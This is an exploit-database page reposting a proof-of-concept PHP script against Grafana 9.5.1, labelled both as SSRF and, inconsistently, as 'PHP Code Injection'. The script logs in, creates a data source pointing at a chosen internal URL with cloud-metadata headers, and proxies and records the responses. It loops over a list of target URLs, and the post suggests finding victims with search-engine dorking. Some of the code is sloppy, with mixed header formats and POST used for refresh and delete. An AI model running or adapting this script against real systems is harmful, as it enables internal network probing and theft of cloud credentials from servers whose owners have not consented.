Vulners
Lucene search
Grafana 9.5.1 Server-Side Request Forgery
=============================================================================================================================================
| # Title : Grafana 9.5.1 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://grafana.com/grafana/download/9.5.1 |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description:
It is mainly used as an SSRF (Server-Side Request Forgery) attack against Grafana, an open source data analytics application used to display charts and monitored data. Here are the main uses
[+] save code as poc.php .
[+] Set Targrt : line = 225 + 226 + 227
[+] USage : php poc.php
[+] PayLoad :
<?php
// إعدادات الاتصال بـ cURL
function send_post_request($url, $data, $headers, $cookies) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_COOKIE, $cookies);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
if ($data) {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // إيقاف التحقق من الشهادات
$response = curl_exec($ch);
$status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return [
'status_code' => $status_code,
'body' => $response
];
}
// إنشاء مصدر Grafana
function create_source($sessionid, $ssrf_url, $ghost) {
$rawBody = json_encode([
"name" => "SSRF-TESTING",
"type" => "prometheus",
"access" => "proxy",
"isDefault" => false
]);
$headers = [
"Origin: " . $ghost,
"Accept: application/json, text/plain, */*",
"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0",
"Referer: " . $ghost . "/datasources/new",
"Connection: close",
"x-grafana-org-id: 1",
"content-type: application/json",
"Accept-Language: en-US,en;q=0.5",
"Accept-Encoding: gzip, deflate"
];
$cookies = "grafana_session=" . $sessionid;
$url = $ghost . "/api/datasources";
$response = send_post_request($url, $rawBody, $headers, $cookies);
if ($response['status_code'] == 200) {
$data = json_decode($response['body'], true);
if (isset($data['id'])) {
echo "Source Created\n";
return $data['id'];
} else {
echo "Error: " . $response['body'] . "\n";
}
} else {
echo "Error:\n";
echo "Status code: " . $response['status_code'] . "\n";
echo $response['body'] . "\n";
}
}
// تحديث مصدر Grafana
function refresh_source($ghost, $sessionid, $id) {
$headers = [
"Accept: application/json, text/plain, */*",
"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0",
"Referer: " . $ghost . "/datasources/edit/6/",
"Connection: close",
"x-grafana-org-id: 1",
"Accept-Language: en-US,en;q=0.5",
"Accept-Encoding: gzip, deflate"
];
$cookies = "grafana_session=" . $sessionid;
$url = $ghost . "/api/datasources/" . $id;
$response = send_post_request($url, null, $headers, $cookies);
if ($response['status_code'] == 200) {
echo "Refreshed Sources\n";
} else {
echo "Error:\n";
echo "Status code: " . $response['status_code'] . "\n";
echo $response['body'] . "\n";
}
}
// إنشاء SSRF في Grafana
function create_ssrf($sessionid, $ssrf_url, $ghost, $id) {
$rawBody = json_encode([
"id" => $id,
"orgId" => 1,
"name" => "SSRF-TESTING",
"type" => "prometheus",
"access" => "proxy",
"url" => $ssrf_url,
"password" => "test",
"user" => "test",
"database" => "test",
"basicAuth" => false,
"withCredentials" => false,
"isDefault" => false,
"jsonData" => [
"tlsSkipVerify" => true,
"httpHeaderName1" => "Metadata-Flavor",
"httpHeaderName2" => "Metadata",
"httpMethod" => "GET"
],
"secureJsonData" => [
"httpHeaderValue1" => "Google",
"httpHeaderValue2" => "true"
],
"version" => 1,
"readOnly" => false
]);
$headers = [
"Origin: " . $ghost,
"Accept: application/json, text/plain, */*",
"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0",
"Referer: " . $ghost . "/datasources/edit/6/",
"Connection: close",
"x-grafana-org-id: 1",
"content-type: application/json",
"Accept-Language: en-US,en;q=0.5",
"Accept-Encoding: gzip, deflate"
];
$cookies = "grafana_session=" . $sessionid;
$url = $ghost . "/api/datasources/" . $id;
$response = send_post_request($url, $rawBody, $headers, $cookies);
if ($response['status_code'] == 200) {
echo "SSRF Source Updated\n";
} else {
echo "Error:\n";
echo "Status code: " . $response['status_code'] . "\n";
echo $response['body'] . "\n";
}
}
// فحص Grafana SSRF
function check_ssrf($sessionid, $id, $ghost, $ssrf_url) {
$headers = [
"Accept: application/json, text/plain, */*",
"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0",
"Referer: " . $ghost . "/datasources/edit/" . $id . "/",
"Connection: close",
"x-grafana-org-id: 1",
"Accept-Language: en-US,en;q=0.5",
"Accept-Encoding: gzip, deflate",
"x-grafana-nocache" => "true"
];
$cookies = "grafana_session=" . $sessionid;
$url = $ghost . "/api/datasources/proxy/" . $id . "/";
$response = send_post_request($url, null, $headers, $cookies);
if ($response['status_code'] != 502) {
echo "Status code: " . $response['status_code'] . "\n";
echo "Response body:\n" . $response['body'] . "\n";
$gghost = parse_url($ghost, PHP_URL_HOST);
$sub_addr = explode('.', $gghost)[0];
file_put_contents($sub_addr . ".txt", "SSRF URL: " . $ssrf_url . "\nStatus code: " . $response['status_code'] . "\nResponse body: " . $response['body'] . "\n\n", FILE_APPEND);
} else {
echo "Error:\n";
echo $response['body'] . "\n";
}
}
// حذف مصدر Grafana
function delete_source($sessionid, $id, $ghost) {
$headers = [
"Origin: " . $ghost,
"Accept: application/json, text/plain, */*",
"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0",
"Referer: " . $ghost . "/datasources/edit/3/",
"Connection: close",
"x-grafana-org-id: 1",
"Accept-Language: en-US,en;q=0.5",
"Accept-Encoding: gzip, deflate"
];
$cookies = "grafana_session=" . $sessionid;
$url = $ghost . "/api/datasources/" . $id;
$response = send_post_request($url, null, $headers, $cookies);
if (strpos($response['body'], "Data source deleted") !== false) {
echo "Deleted Old SSRF Source\n";
} else {
echo "Error:\n";
echo $response['body'] . "\n";
exit(0);
}
}
// تسجيل الدخول إلى Grafana
function login($ghost, $username, $password) {
$rawBody = json_encode(["user" => $username, "password" => $password, "email" => ""]);
$headers = [
"Origin: " . $ghost,
"Accept: application/json, text/plain, */*",
"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0",
"Referer: " . $ghost . "/signup",
"Connection: close",
"content-type: application/json",
"Accept-Language: en-US,en;q=0.5",
"Accept-Encoding: gzip, deflate"
];
$cookies = "redirect_to=%2F";
$url = $ghost . "/login";
$response = send_post_request($url, $rawBody, $headers, $cookies);
$data = json_decode($response['body'], true);
if (isset($data['grafana_session'])) {
return $data['grafana_session'];
} elseif (isset($data['grafana_sess'])) {
return $data['grafana_sess'];
} else {
echo "Login Session Cookie not set\n";
exit(0);
}
}
// منطق التنفيذ الرئيسي
$username = 'username'; // أدخل اسم المستخدم هنا
$password = 'password'; // أدخل كلمة المرور هنا
$ghost = 'http://example.com'; // أدخل رابط Grafana هنا
$ssrf_url = 'http://ssrf-target.com'; // أدخل URL هدف SSRF هنا
$files = 'ssrf_urls.txt'; // الملف الذي يحتوي على URLs إذا كان موجودًا
if ($username) {
$sessionid = login($ghost, $username, $password);
}
if ($ssrf_url) {
$id = create_source($sessionid, $ssrf_url, $ghost);
refresh_source($ghost, $sessionid, $id);
create_ssrf($sessionid, $ssrf_url, $ghost, $id);
check_ssrf($sessionid, $id, $ghost, $ssrf_url);
}
if ($files) {
if (file_exists($files)) {
$lines = file($files, FILE_IGNORE_NEW_LINES);
foreach ($lines as $ssrf_url) {
$id = create_source($sessionid, $ssrf_url, $ghost);
refresh_source($ghost, $sessionid, $id);
create_ssrf($sessionid, $ssrf_url, $ghost, $id);
check_ssrf($sessionid, $id, $ghost, $ssrf_url);
}
}
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Mar 2025 00:00Current
7.4High risk
Vulners AI Score7.4